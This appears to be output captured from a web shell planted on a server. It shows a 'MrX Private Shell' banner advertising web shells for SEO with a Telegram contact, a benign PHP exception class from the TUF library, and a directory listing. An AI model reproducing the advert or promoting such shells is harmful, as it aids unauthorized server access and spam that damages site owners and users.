__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Tuf\Exception;
/**
* Indicates that an item was not found in the repository data.
*/
class NotFoundException extends TufException
{
/**
* Constructs the exception.
*
* @param string $key
* (optional) The unique identifier, if any, for the item that was not
* found.
* @param string $itemType
* (optional) The type of item (signing key, file, etc.) that was not
* found. Used to construct the exception message. If left blank, the
* word 'item' will be used by default.
* @param \Throwable|null $previous
* (optional) The previous exception, if any, for exception chaining.
*/
public function __construct(string $key = '', string $itemType = 'Item', \Throwable $previous = null)
{
$message = "$itemType not found";
if ($key != "") {
$message = "$itemType not found: $key";
}
parent::__construct($message, 0, $previous);
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Attack | Folder | 0775 |
|
|
| DownloadSizeException.php | File | 163 B | 0664 |
|
| FormatException.php | File | 887 B | 0664 |
|
| InvalidKeyException.php | File | 145 B | 0664 |
|
| MetadataException.php | File | 132 B | 0664 |
|
| NotFoundException.php | File | 988 B | 0664 |
|
| RepoFileNotFound.php | File | 145 B | 0664 |
|
| TufException.php | File | 154 B | 0664 |
|